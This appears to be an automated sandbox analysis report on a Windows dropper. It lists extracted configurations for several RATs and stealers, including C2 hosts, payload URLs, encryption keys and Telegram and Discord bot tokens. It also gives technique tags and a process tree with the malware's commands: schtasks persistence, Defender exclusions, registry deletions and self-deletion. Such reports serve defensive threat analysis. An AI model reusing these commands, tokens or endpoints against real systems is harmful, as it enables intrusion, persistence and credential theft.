asyncrat | fda46baacb7dcd211250fe29aaa2b1b17657961675b4d8c6415a0c3d004d00a6

Analysis

max time kernel
5s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
19/04/2025, 21:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

764KB
MD5

85e3d4ac5a6ef32fb93764c090ef32b7
SHA1

adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52
SHA256

4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1
SHA512

a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab
SSDEEP

12288:6MSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Ufbj:6nsJ39LyjbJkQFMhmC+6GD9mH

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

quasar

Version

3.1.5

Botnet

nEGRosis

go-dramatically.gl.at.ply.gg:2676

Mutex

$Sxr-camQAVefBjk7nvL7ph

Attributes

encryption_key
klJRtMXiJcydKsaanVG9
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Driver689
subdirectory
temp

Extracted

Family

quasar

Version

1.4.1

Botnet

Helper Atanka

193.203.238.136:8080

Mutex

14f39659-ca5b-4af7-8045-bed3500c385f

Attributes

encryption_key
11049F2AEBDCF8E3A57474CD5FBA40FB2FFC5424
install_name
diskutil.exe
log_directory
Logs
reconnect_delay
3000
startup_key
diskutil
subdirectory
diskutil

Extracted

Family

xworm

Version

5.0

week-dictionary.gl.at.ply.gg:12466

event-dollar.gl.at.ply.gg:42627

Mutex

WIHzy7HOqD8TiFlq

Attributes

Install_directory
%AppData%
install_file
PowerShell.exe

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

DDNS

193.161.193.99:32471

Mutex

807f3187-d087-4fff-beff-e73293a32af8

Attributes

encryption_key
81A0C14D4C705B3C678E573C849DE7F6A3671A8B
install_name
jusched.exe
log_directory
CachedLogs
reconnect_delay
3000
startup_key
Java Update Scheduler
subdirectory
Java

Extracted

Family

quasar

Version

1.4.1

Botnet

Runtime Broker

senoc43726-29929.portmap.host:29929

Mutex

48854ba7-7fa3-48f5-bfc4-7f597af68d7d

Attributes

encryption_key
26122B3BD81CEECD4FC3F2441D532F19A20471C6
install_name
RuntimeBroker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker
subdirectory
discord

Extracted

Family

quasar

Version

1.4.1

Botnet

sigorta

18.198.25.148:1604

Mutex

af7e773d-541a-46fd-87d3-06bb0a26aab9

Attributes

encryption_key
D306945220105109C86E6E257D749CE885E76091
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

stealc

Botnet

Line

http://154.216.17.90

Attributes

url_path
/a48146f6763ef3af.php

Extracted

Family

xworm

127.0.0.1:6000

103.211.201.109:6000

Attributes

Install_directory
%AppData%
install_file
XClient.exe
telegram
https://api.telegram.org/bot7929370892:AAGwrX5TeyxQidZdAEm_Z6-CDvPUOQzVY1M

Extracted

Family

lumma

https://p3ar11fter.sbs/api

https://3xp3cts1aim.sbs/api

https://owner-vacat10n.sbs/api

https://peepburry828.sbs/api

https://p10tgrace.sbs/api

https://befall-sm0ker.sbs/api

https://librari-night.sbs/api

https://processhol.sbs/api

https://qualifiresui.cyou/api

Extracted

Family

quasar

Version

1.4.1

Botnet

Hubert Pilarczyk

pawela827-35962.portmap.host:35962

Mutex

ca431979-125b-480f-adac-43c48c1e1832

Attributes

encryption_key
39F4E87BBB832270AC54CA5065E707DFB3689A56
install_name
vsjitdebuggerui.exe
log_directory
CEF
reconnect_delay
3000
startup_key
Proces hosta dla zadań systemu Windows
subdirectory
3880

Extracted

Family

vidar

Version

13.3

Botnet

70790cf457f5ee5e9df1780bfa648812

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

asyncrat

Version

Shadow X RAT & HVNC 1.0.0

Botnet

reWASD

sayo0w.duckdns.org:7173

Mutex

2318923179jj27139792813j721983j7213987j98213j97823j789213j978213j978j12391239j913278321

Attributes

delay
1
install
true
install_file
svchost.exe
install_folder
C:\WIndows

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Nigga

yzs-42879.portmap.host:42879

Mutex

57d72303-b5e9-46aa-8cc4-9690809c1a9e

Attributes

encryption_key
F1EBDB1862062F9265C0B5AC4D02C76D026534D0
install_name
svchost.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
Steam

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

192.168.100.10:4782

Mutex

b3f317d7-974a-4778-9834-f3aab4d3ff29

Attributes

encryption_key
94D4834DE1428C5691526E48ADB0953FE5CB1F35
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.0

Botnet

svhost

151.177.61.79:4782

Mutex

a148a6d8-1253-4e62-bc5f-c0242dd62e69

Attributes

encryption_key
5BEC1A8BC6F8F695D1337C51454E0B7F3A4FE968
install_name
svhost.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svhost
subdirectory
svhost

Extracted

Family

discordrat

Attributes

discord_token
MTA4MDk4MTIyMDY1OTI5ODM1Nw.Ge9WdI.mgiKFBRpd3OMUTf1SBAtgUqqVPKf4evZxJ5nYU
server_id
1080979971050319872

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral2/memory/2320-1323-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2320-1322-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detect Xworm Payload 6 IoCs

resource	yara_rule
behavioral2/files/0x001900000002b1ee-511.dat	family_xworm
behavioral2/memory/2848-512-0x00000000006D0000-0x00000000006DE000-memory.dmp	family_xworm
behavioral2/files/0x001900000002b292-907.dat	family_xworm
behavioral2/memory/1552-912-0x0000000000BC0000-0x0000000000BD0000-memory.dmp	family_xworm
behavioral2/files/0x001e00000002b29a-994.dat	family_xworm
behavioral2/memory/6492-999-0x0000000000730000-0x0000000000746000-memory.dmp	family_xworm

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Discordrat family
discordrat
Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit
Lockbit family
lockbit
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 19 IoCs

resource	yara_rule
behavioral2/files/0x001900000002b1c1-285.dat	family_quasar
behavioral2/memory/5712-297-0x0000000000810000-0x000000000087E000-memory.dmp	family_quasar
behavioral2/files/0x001900000002b1ca-365.dat	family_quasar
behavioral2/memory/5968-373-0x0000000000A20000-0x0000000000D52000-memory.dmp	family_quasar
behavioral2/files/0x001e00000002b1fc-539.dat	family_quasar
behavioral2/files/0x001900000002b223-600.dat	family_quasar
behavioral2/memory/5568-627-0x0000000000B40000-0x0000000000E64000-memory.dmp	family_quasar
behavioral2/files/0x001900000002b222-644.dat	family_quasar
behavioral2/memory/4228-651-0x00000000000D0000-0x00000000003F4000-memory.dmp	family_quasar
behavioral2/files/0x000c00000000d3de-874.dat	family_quasar
behavioral2/memory/3360-879-0x0000000000190000-0x00000000004B4000-memory.dmp	family_quasar
behavioral2/files/0x001b00000002b2a0-1304.dat	family_quasar
behavioral2/memory/6184-1311-0x0000000000C60000-0x0000000000F84000-memory.dmp	family_quasar
behavioral2/files/0x001900000002b309-1382.dat	family_quasar
behavioral2/memory/5356-1399-0x0000000000560000-0x0000000000884000-memory.dmp	family_quasar
behavioral2/files/0x001900000002b31c-1453.dat	family_quasar
behavioral2/memory/7740-1461-0x0000000000970000-0x0000000000C94000-memory.dmp	family_quasar
behavioral2/files/0x001900000002b321-1466.dat	family_quasar
behavioral2/memory/6216-1471-0x0000000000270000-0x00000000002F4000-memory.dmp	family_quasar

Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs

resource	yara_rule
behavioral2/files/0x001a00000002b32b-1716.dat	family_lockbit

Sliver RAT v2 1 IoCs

resource	yara_rule
behavioral2/files/0x000400000002a1e0-408.dat	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x001900000002b313-1355.dat	family_asyncrat

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral2/files/0x001900000002b1cb-421.dat	mimikatz

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
6064	powershell.exe
2848	PowerShell.exe
6972	powershell.exe
7184	powershell.exe
7180	powershell.exe
7596	powershell.exe
6064	powershell.exe
3192	powershell.exe
6640	powershell.exe
6316	powershell.exe
6892	powershell.exe
6816	powershell.exe
7852	powershell.exe
7820	powershell.exe
6668	powershell.exe
6228	powershell.exe

Downloads MZ/PE file 11 IoCs

flow	pid	Process
9	5708	._cache_Synaptics.exe
9	5708	._cache_Synaptics.exe
9	5708	._cache_Synaptics.exe
9	5708	._cache_Synaptics.exe
9	5708	._cache_Synaptics.exe
9	5708	._cache_Synaptics.exe
9	5708	._cache_Synaptics.exe
3	4948	._cache_4363463463464363463463463.exe
17	4948	._cache_4363463463464363463463463.exe
20	3928	._cache_Synaptics.exe
7	3928	._cache_Synaptics.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
7128	netsh.exe
6608	netsh.exe
9196	netsh.exe
2304	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4620	attrib.exe

Executes dropped EXE 8 IoCs

pid	Process
4948	._cache_4363463463464363463463463.exe
4488	Synaptics.exe
708	Synaptics.exe
5708	._cache_Synaptics.exe
3928	._cache_Synaptics.exe
5712	thin.exe
2204	spoofer.exe
2848	av_downloader1.1.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	4363463463464363463463463.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
35	raw.githubusercontent.com
40	raw.githubusercontent.com
174	raw.githubusercontent.com
8	raw.githubusercontent.com
9	raw.githubusercontent.com
24	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\._cache_Synaptics.exe	Synaptics.exe
File opened for modification	C:\Windows\SysWOW64\._cache_Synaptics.exe	Synaptics.exe
File created	C:\Windows\SysWOW64\Files\thin.exe	._cache_Synaptics.exe
File created	C:\Windows\SysWOW64\Files\diskutil.exe	._cache_Synaptics.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x001d00000002b043-1818.dat	upx
behavioral2/memory/7188-1820-0x0000000000400000-0x0000000000422000-memory.dmp	upx

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4800	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
3024	2352	WerFault.exe	177
7088	6760	WerFault.exe	193
6780	2640	WerFault.exe	293

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	thin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	av_downloader1.1.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
8904	reg.exe
8248	PING.EXE
4288	PING.EXE
3172	PING.EXE
6228	PING.EXE
1252	PING.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1532	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3648	ipconfig.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2211465213-323295031-1970282057-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\MUICACHE	spoofer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	4363463463464363463463463.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
6228	PING.EXE
1252	PING.EXE
8248	PING.EXE
4288	PING.EXE
3172	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2032	schtasks.exe
3548	schtasks.exe
3488	schtasks.exe
1492	schtasks.exe
7292	schtasks.exe
5616	schtasks.exe
6936	schtasks.exe
6616	schtasks.exe
2932	schtasks.exe
2312	SCHTASKS.exe
6868	schtasks.exe
2980	schtasks.exe
2596	schtasks.exe
3496	schtasks.exe
2176	schtasks.exe
8116	schtasks.exe
8	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2396	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4948	._cache_4363463463464363463463463.exe
Token: SeDebugPrivilege	3928	._cache_Synaptics.exe
Token: SeDebugPrivilege	5708	._cache_Synaptics.exe
Token: SeDebugPrivilege	5712	thin.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1312 wrote to memory of 4948	1312	4363463463464363463463463.exe	82
PID 1312 wrote to memory of 4948	1312	4363463463464363463463463.exe	82
PID 1312 wrote to memory of 4948	1312	4363463463464363463463463.exe	82
PID 1312 wrote to memory of 4488	1312	4363463463464363463463463.exe	87
PID 1312 wrote to memory of 4488	1312	4363463463464363463463463.exe	87
PID 1312 wrote to memory of 4488	1312	4363463463464363463463463.exe	87
PID 4976 wrote to memory of 708	4976	cmd.exe	88
PID 4976 wrote to memory of 708	4976	cmd.exe	88
PID 4976 wrote to memory of 708	4976	cmd.exe	88
PID 708 wrote to memory of 5708	708	Synaptics.exe	89
PID 708 wrote to memory of 5708	708	Synaptics.exe	89
PID 708 wrote to memory of 5708	708	Synaptics.exe	89
PID 4488 wrote to memory of 3928	4488	Synaptics.exe	91
PID 4488 wrote to memory of 3928	4488	Synaptics.exe	91
PID 4488 wrote to memory of 3928	4488	Synaptics.exe	91
PID 5708 wrote to memory of 5712	5708	._cache_Synaptics.exe	95
PID 5708 wrote to memory of 5712	5708	._cache_Synaptics.exe	95
PID 5708 wrote to memory of 5712	5708	._cache_Synaptics.exe	95
PID 4948 wrote to memory of 2204	4948	._cache_4363463463464363463463463.exe	96
PID 4948 wrote to memory of 2204	4948	._cache_4363463463464363463463463.exe	96
PID 3928 wrote to memory of 2848	3928	._cache_Synaptics.exe	140
PID 3928 wrote to memory of 2848	3928	._cache_Synaptics.exe	140
PID 3928 wrote to memory of 2848	3928	._cache_Synaptics.exe	140
PID 2848 wrote to memory of 3228	2848	av_downloader1.1.exe	624
PID 2848 wrote to memory of 3228	2848	av_downloader1.1.exe	624
PID 5712 wrote to memory of 5616	5712	thin.exe	103
PID 5712 wrote to memory of 5616	5712	thin.exe	103
PID 5712 wrote to memory of 5616	5712	thin.exe	103

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4620	attrib.exe
7272	attrib.exe
7992	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1312
- C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe"
  2⤵
  - Downloads MZ/PE file
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4948
- - C:\Users\Admin\AppData\Local\Temp\Files\spoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\spoofer.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    PID:2204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C://iduishopSpoofer//run.bat
      4⤵
      PID:5052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C://iduishopSpoofer//productkey.bat
      4⤵
      PID:7804
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v DigitalProductId
        5⤵
        
        PID:3228
      - C:\Windows\system32\reg.exe
        
        reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v DigitalProductId
        6⤵
        
        PID:6548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C://iduishopSpoofer//OS.bat
      4⤵
      PID:7452
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vgk\Security" /f
        5⤵
        
        PID:7484
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vgk" /f
        5⤵
        
        PID:3784
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vgc\Security" /f
        5⤵
        
        PID:8696
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vgc" /f
        5⤵
        
        PID:7524
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Uninstall\Riot Vangard" /f
        5⤵
        
        PID:9044
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\VALORANT-Win64-Shipping.exe" /f
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8904
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{FA99DFC7-6AC2-453A-A5E2-5E2AFF4507BD}\Count" /f
        5⤵
        
        PID:8740
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count" /f
        5⤵
        
        PID:7484
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{F2A1CB5A-E3CC-4A2E-AF9D-505A7009D442}\Count" /f
        5⤵
        
        PID:8068
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count" /f
        5⤵
        
        PID:5464
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{CAA59E3C-4792-41A5-9909-6A6A8D32490E}\Count" /f
        5⤵
        
        PID:8852
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{BCB48336-4DDD-48FF-BB0B-D3190DACB3E2}\Count" /f
        5⤵
        
        PID:7504
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{B267E3AD-A825-4A09-82B9-EEC22AA3B847}\Count" /f
        5⤵
        
        PID:9152
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{A3D53349-6E61-4557-8FC7-0028EDCEEBF6}\Count" /f
        5⤵
        
        PID:9148
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC14-11DF-BB8C-A2F1DED72085}\Count" /f
        5⤵
        
        PID:6704
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\riotclient" /f
        5⤵
        
        PID:1032
- - C:\Users\Admin\AppData\Local\Temp\Files\mimikatz.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\mimikatz.exe"
    3⤵
    PID:5280
- - C:\Users\Admin\AppData\Local\Temp\Files\VB.NET%20CRYPTER%20V2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\VB.NET%20CRYPTER%20V2.exe"
    3⤵
    PID:4992
- - C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"
    3⤵
    PID:5044
- - C:\Users\Admin\AppData\Local\Temp\Files\CritScript.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\CritScript.exe"
    3⤵
    PID:4264
  - - C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
      "C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"
      4⤵
      PID:5568
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3548
    - - C:\Users\Admin\AppData\Roaming\Java\jusched.exe
        
        "C:\Users\Admin\AppData\Roaming\Java\jusched.exe"
        5⤵
        
        PID:3908
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2176
- - C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"
    3⤵
    PID:4228
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3488
  - - C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe"
      4⤵
      PID:1672
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1492
- - C:\Users\Admin\AppData\Local\Temp\Files\test.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
    3⤵
    PID:2932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\Application'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3192
  - - C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe
      "C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe"
      4⤵
      PID:3420
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
      4⤵
      PID:6164
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:6224
- - C:\Users\Admin\AppData\Local\Temp\Files\aa.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\aa.exe"
    3⤵
    PID:3360
- - C:\Users\Admin\AppData\Local\Temp\Files\vtoroy.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\vtoroy.exe"
    3⤵
    PID:3744
- - C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
    3⤵
